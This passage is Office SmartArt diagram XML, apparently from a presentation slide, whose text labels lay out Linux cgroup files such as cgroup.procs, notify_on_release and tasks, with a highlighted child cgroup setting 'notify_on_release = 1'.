    <dgm:cxn modelId="{2394BC73-4027-4EE2-A328-DAB86839E501}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{4A8EAC8B-62AB-4CCE-8A50-0E3B8EC18EA9}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{1D9FB626-8CF3-41A7-B912-8649C247622F}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{0B0F154E-5D84-40E0-814D-2D5CCAAE98CE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{A38E181C-CC89-481C-BECA-1CAE94A0F47E}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{DCE4E765-3C65-4E4E-AB52-2A237FE0C3AC}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{4D6DC58B-C1F1-4ED2-87F0-91DEF55F5094}" type="presParOf" srcId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" destId="{5652E85C-FE3E-406F-821C-3E2BB419D688}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{5A88A0CD-4288-43CB-9750-BD0F27A0BAF2}" type="presParOf" srcId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" destId="{89FF70DB-3245-4090-9DD7-140609F183D5}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{35A5F51D-A493-4C19-B81A-519823692A63}" type="presParOf" srcId="{89FF70DB-3245-4090-9DD7-140609F183D5}" destId="{2AE096B0-E6DB-4467-AFE8-90C18B3946CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{65FA70B6-9168-463E-8DC8-817538A29A2D}" type="presParOf" srcId="{89FF70DB-3245-4090-9DD7-140609F183D5}" destId="{CD020586-959D-4655-A68D-1FCA2B8A2C2E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{5F7B037F-3D33-4E2E-AC2B-86C49FE2D6B3}" type="presParOf" srcId="{89FF70DB-3245-4090-9DD7-140609F183D5}" destId="{FD1E57F3-2AF9-4C0A-8DD3-29E7D85AFC55}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{ADD4A2BE-D162-4EE4-ABEF-8A575334491C}" type="presParOf" srcId="{FD1E57F3-2AF9-4C0A-8DD3-29E7D85AFC55}" destId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{DF5CEFD5-13AB-4B52-AFE8-786F5566DF1D}" type="presParOf" srcId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" destId="{EAF9D065-4A1A-487B-8034-89DC20147E9F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{FDAB1395-406E-4A16-BEC6-BFC5956E096C}" type="presParOf" srcId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" destId="{A77496CE-3FAA-4E9F-AC35-C52715DD80A1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{50CB2B6A-F924-4EA2-9F9F-B23CFD93FA7D}" type="presParOf" srcId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" destId="{DE26DBA6-60A8-4CCA-85C8-D71573485800}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{A9E035E8-0862-477A-BAB5-D8DACD53D867}" type="presParOf" srcId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" destId="{91BB4A79-DF33-4DD4-9818-43EE4F124C81}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{A2FBE207-4A2F-4A2F-AB4B-22ADF6F1C908}" type="presParOf" srcId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" destId="{DDE998AB-26DA-4751-B5BE-A52201553888}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{6FEED32C-DF8B-481C-946C-167FC15BE218}" type="presParOf" srcId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" destId="{7F44D063-1EBE-4862-97A1-C6DA5FA57AA5}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{A6BC2D05-0C07-4DD5-9265-ADFFA2D8BBDB}" type="presParOf" srcId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" destId="{2BE3E27E-A504-4384-91DB-AFCE6161E041}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{95FA1AF9-7135-470F-ACFE-7B15ABD95E90}" type="presParOf" srcId="{2BE3E27E-A504-4384-91DB-AFCE6161E041}" destId="{37E71803-FCFC-45CD-881A-0B6ABB3D09EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{6317BD48-23B0-46F8-A203-A6D7AC792A27}" type="presParOf" srcId="{2BE3E27E-A504-4384-91DB-AFCE6161E041}" destId="{AB3DB6A9-26BD-4CAF-A28E-042915C55B6C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{CF52AE40-B9BA-4FC1-B9E2-564C2D0FC1F5}" type="presParOf" srcId="{2BE3E27E-A504-4384-91DB-AFCE6161E041}" destId="{5E3A8333-E7A6-4746-884F-A8C381521693}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{3BAA3BE3-D4A9-4D67-91EF-17E9F849BF2F}" type="presParOf" srcId="{5E3A8333-E7A6-4746-884F-A8C381521693}" destId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{9C22F46F-7046-4883-932E-E5DEC00474AA}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{E0E40906-6643-4F9A-933A-C9F50702F6A6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{F9F3C766-A874-478B-8000-3F19BC612AC3}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{3F6DF056-54C9-4B5B-B872-2FEEFAB793C6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{473AFA36-6C26-47D3-97FF-CA949046C59A}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{A9132D05-4FA0-424A-AF25-E417BE74898D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{83AB004C-355B-45B1-889D-98882BA2BD2D}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{6E8AD59F-7B04-4D10-97DA-872371E7EF95}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{8C09F144-1317-47D3-BFE7-36AB3787A912}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{A9BD8B9E-F3BD-41E8-9989-9E3EAD575A42}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{BA9A5867-A4C3-4EB6-A486-319C3BAB5E40}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{B03C7BCC-0B46-4833-863C-73FA4C5C54D5}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{7623B50D-4CFD-46C6-9D53-EF134A023F73}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{6B803797-6FD1-4CE6-9C71-3D6893295E52}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>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7747C4-0450-45A1-92B0-FD187A05A858}"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137BF1E8-700B-463B-8FC5-55A410DC87F6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>/sys/fs/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>cgroups</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36B52051-E401-418E-BFF1-619351E9F0AB}" type="parTrans" cxnId="{DE8A18B6-FAA9-42C2-B0AF-DA29793ECA04}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{438FB60C-7E18-4BD9-815D-51B27F8BF17B}" type="sibTrans" cxnId="{DE8A18B6-FAA9-42C2-B0AF-DA29793ECA04}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE96C1ED-7B76-486B-8843-675EE73C98DB}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>cpuset</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFC81BCD-C642-40E4-8D00-FFF3F221511B}" type="parTrans" cxnId="{B87053F7-713D-4BCB-A86B-197D2D3C06DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E9A632E-A71F-4E74-9E0E-679301DA5E87}" type="sibTrans" cxnId="{B87053F7-713D-4BCB-A86B-197D2D3C06DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{533D632E-33DF-4285-AE51-BD966996E5E2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FBC4AEF-7863-4E43-BC8B-EA4B1B9A5AD0}" type="parTrans" cxnId="{6AA145C0-C8B4-4010-886E-73BF5E26CE30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FEBFFF24-421D-473A-B86D-8F61E2B8D0E2}" type="sibTrans" cxnId="{6AA145C0-C8B4-4010-886E-73BF5E26CE30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8ACD0E6F-7768-4B1B-AED0-AC0213CAE850}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>rdma</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7368EF3A-2403-44B5-9C68-71777489FE0F}" type="parTrans" cxnId="{0526FD2A-99A3-4FAC-995E-7552576FAF00}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7A97018-0D72-46DD-BF81-AC5F8EC3E431}" type="sibTrans" cxnId="{0526FD2A-99A3-4FAC-995E-7552576FAF00}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7EC4698E-129D-485E-A885-3384CAAD9D2C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>pids</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F13785F-9D42-4CA3-8624-65CE75D93DEA}" type="parTrans" cxnId="{CD1A1EEB-49B3-41DB-8725-1DF74468C8D4}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="C00000"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE918CF2-488A-4584-832E-F477E10002B3}" type="sibTrans" cxnId="{CD1A1EEB-49B3-41DB-8725-1DF74468C8D4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{383EE767-B207-4441-9C5D-E6C4BC7218DC}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>systemd</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FDCBEDF-4391-44B7-B5FB-D02AA2A558AB}" type="parTrans" cxnId="{A7886C05-2959-43AD-AC09-283D16E08998}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="C00000"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FEA9E2D2-B433-46EC-BA75-3E30884B7875}" type="sibTrans" cxnId="{A7886C05-2959-43AD-AC09-283D16E08998}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69A86127-BEED-43E6-A625-DDD212F858DA}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>cgroup.clone_children</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23E6BAE6-2C3B-4B1E-BCF5-A40278159E86}" type="parTrans" cxnId="{71B96964-811E-4EFE-95E4-D6E3E90ABA82}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00AA27E5-B8E2-4181-81C0-DFED32212ED7}" type="sibTrans" cxnId="{71B96964-811E-4EFE-95E4-D6E3E90ABA82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4353DE3E-19C8-4969-88A5-B4BFF4C95A08}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" smtClean="0"/>
            <a:t>cgroup.procs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E072C68-64D5-4AC5-8E6D-FF34EF5FDCED}" type="parTrans" cxnId="{7DEAA5B7-D6F9-43CE-8E8D-383440FB4307}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC60324A-F660-44E1-91E9-9CFE35E10107}" type="sibTrans" cxnId="{7DEAA5B7-D6F9-43CE-8E8D-383440FB4307}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7667924-28CC-4450-88C7-9136C5776901}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" smtClean="0"/>
            <a:t>cgroup.sane_behavior</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A07FFB83-3543-4247-B673-5937F74B41DC}" type="parTrans" cxnId="{533FA6BC-371C-4845-97EB-47CA1DFA4A6A}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="C00000"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F3B7135-5D0B-42B8-9D02-9D6B37731486}" type="sibTrans" cxnId="{533FA6BC-371C-4845-97EB-47CA1DFA4A6A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F23BA4E4-207D-4CFA-8C19-D5A6FF5EEA35}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" smtClean="0"/>
            <a:t>notify_on_release</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF8F5E27-D3DA-41B4-A633-F21535649EF5}" type="parTrans" cxnId="{82E3B8A8-9431-40CB-9690-A70DD0EF4ACF}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="C00000"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAEF053D-E4E6-41A3-A816-254381594D4F}" type="sibTrans" cxnId="{82E3B8A8-9431-40CB-9690-A70DD0EF4ACF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BCD041D-0303-490A-9308-5E7D90ECB527}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>memory</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFCDA1DE-4C64-4E1C-B00D-96A678B928BB}" type="sibTrans" cxnId="{7F46F7A2-CA6F-4499-B22C-1AD6C1FD0A81}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D3B01CA6-16F5-4B00-9A23-BC3189CD8902}" type="parTrans" cxnId="{7F46F7A2-CA6F-4499-B22C-1AD6C1FD0A81}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="C00000"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DB837DB-FCE0-4CA7-A28A-D905F6E87B0A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>child_cgroup</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1E87BA5-3C6A-4997-9623-6582B1E76098}" type="parTrans" cxnId="{DD56324C-2B55-4105-BB0E-2FD6C24EA62E}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="C00000"/>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1CC2EC0-B037-48F7-B4F0-49295DA04CF6}" type="sibTrans" cxnId="{DD56324C-2B55-4105-BB0E-2FD6C24EA62E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{644FF239-DB12-468D-AF0D-D5F9D81EDC2B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>tasks</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2C85FCD-7DF3-4472-B713-228992FD3E1A}" type="parTrans" cxnId="{F8298E2C-957F-4439-A611-A069B0545743}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7F8E2A8-2359-435E-90FD-A4B04E0B6888}" type="sibTrans" cxnId="{F8298E2C-957F-4439-A611-A069B0545743}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C48B0390-A248-4778-A6A9-2EE9703E2ED4}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>notify_on_release</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t> = 1</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{183072D1-E206-4D7B-A326-2112F0AA7B40}" type="parTrans" cxnId="{D3A6253E-F480-46D5-B1FF-8EE15CCF0F49}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4ABED62C-F5C8-4A52-B5EC-74749012C88A}" type="sibTrans" cxnId="{D3A6253E-F480-46D5-B1FF-8EE15CCF0F49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99E3277B-69C7-4710-A49B-B9257E268446}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>cgroup.procs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4960E16-C2BF-4F99-8929-8CCD0824A141}" type="parTrans" cxnId="{0E45946E-FEE9-4AB8-BB1E-2E6DCA5F9833}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6D9E2DD-784F-43BE-8141-04D941FA48A2}" type="sibTrans" cxnId="{0E45946E-FEE9-4AB8-BB1E-2E6DCA5F9833}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
